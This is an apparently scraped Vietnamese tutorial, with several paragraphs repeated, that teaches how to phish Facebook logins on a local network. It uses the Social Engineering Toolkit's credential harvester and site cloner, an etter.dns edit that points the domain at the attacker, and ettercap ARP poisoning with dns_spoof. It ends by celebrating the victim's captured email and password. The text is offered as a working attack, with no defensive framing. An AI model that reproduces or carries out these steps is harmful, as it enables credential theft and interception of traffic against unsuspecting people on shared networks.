Thực hiện giả mạo Website sử dụng công cụ Social Engineering Toolkit ta gõ 2 lệnh sau:
# cd /pentest/exploits/set/
# ./set
Sau đó tiếp tục gõ yes và cho ra kết quả như hình bên dưới:
# cd /pentest/exploits/set/
# ./set
Sau đó tiếp tục gõ yes và cho ra kết quả như hình bên dưới:
![](https://1.bp.blogspot.com/-hGjbl5yd2_U/Vwj2ZpjmpeI/AAAAAAAAAWw/2Zl4_eJegQEl2fpnZ6SaZCgkx1wlKoJYw/s640/1.png)
Ta chọn 1 (Social-Engineering Attacks) rồi tiếp tục chọn 2 (Website Attack Vectors)
![](https://4.bp.blogspot.com/-7PpuvaJ6GNs/Vwj2hlRKopI/AAAAAAAAAW0/rvXEwxWNt7oDiXvJhk8zR8rvw330G3o0g/s640/2.png)
Tiếp tục chọn 3 (Credential Harverster Attack Method)
![](https://2.bp.blogspot.com/-81Oel_i37Ic/Vwj2lGz3NII/AAAAAAAAAW4/JzACi5vxZt4JXhkXdMXRbPw9yoOfQqiag/s640/3.png)
Sau đó chọn 2 (Site Cloner)
![](https://3.bp.blogspot.com/-o0Zag59q39E/Vwj2n1-YvZI/AAAAAAAAAW8/A_E6o-oBkIUSTEqVKHhbge3Ba7Bv4F6_A/s640/4.png)
Tiếp tục ta nhập IP máy Attacker vào rồi sau đó nhập địa chỉ web facebook là www(.)facebook(.) - bỏ "()" com vào (đây chính là website Attacker sẽ giả mạo). Kết quả giống hình bên dưới:
![](https://2.bp.blogspot.com/-3znw6EJF3aA/Vwj2tNbPkdI/AAAAAAAAAXA/gcECWwxW4rwfT6PpGJKJQQuvQ6m40-Thw/s640/5.png)
Giờ ta sẽ thực hiện điều hướng và giả mạo DNS. Ta gõ dòng lệnh sau:
# locate etter.dns
Ta gõ tiếp dòng lệnh sau để vào cấu hình giả mạo DNS đánh lừa người dùng:
# vi /usr/local/share/etter.dns
Ta thay thế toàn bộ địa chỉ cũ thành địa chỉ của attacker rồi lưu lại. Ta được kết quả như hình dưới đây:
# locate etter.dns
Ta gõ tiếp dòng lệnh sau để vào cấu hình giả mạo DNS đánh lừa người dùng:
# vi /usr/local/share/etter.dns
Ta thay thế toàn bộ địa chỉ cũ thành địa chỉ của attacker rồi lưu lại. Ta được kết quả như hình dưới đây:
![](https://4.bp.blogspot.com/-TRNIooItWe0/Vwj2w99Y0DI/AAAAAAAAAXE/zLRdYNT2vY0cUV1YVgzcXgIMeKybfqoXQ/s640/6.png)
Bắt đầu quá trình giả mạo DNS bằng lệnh sau:
# ettercap –Tqi eth0 –P dns_spoof –M arp // //
Và đưa ra kết quả như hình bên dưới:
# ettercap –Tqi eth0 –P dns_spoof –M arp // //
Và đưa ra kết quả như hình bên dưới:
![](https://3.bp.blogspot.com/-Ce82ctfQPY8/Vwj20AA6p9I/AAAAAAAAAXI/UrIhPgvwn28ewfQcEhXN5iRHHj59sMS0w/s640/7.png)
Chuyển sang máy victim và thực hiện đăng nhập vào facebook
![](https://3.bp.blogspot.com/-lJlmj7sUnng/Vwj23VuqJfI/AAAAAAAAAXM/s1oSnluArmcW3FR3LPhzHAQ4wW_HVoDVg/s640/8.png)
Giờ ta quay lại máy attacker và đã thu được thành quả. Ta đã có được user và password facebook của nạn nhân.
Ở hình bên dưới ta có được email đăng nhập và password của nạn nhân, vậy là đã thành công.
Ở hình bên dưới ta có được email đăng nhập và password của nạn nhân, vậy là đã thành công.
![](https://1.bp.blogspot.com/-2ddhLa32K0g/Vwj25zw74pI/AAAAAAAAAXQ/ChqD-6sLxFUQ90LnhQSxr8iD-bU2zGxhQ/s640/9.png)
Xem video hướng dẫn —>goo gl/SXmrZQ (Copy và thay khoảng trắng bằng dấu chấm"." )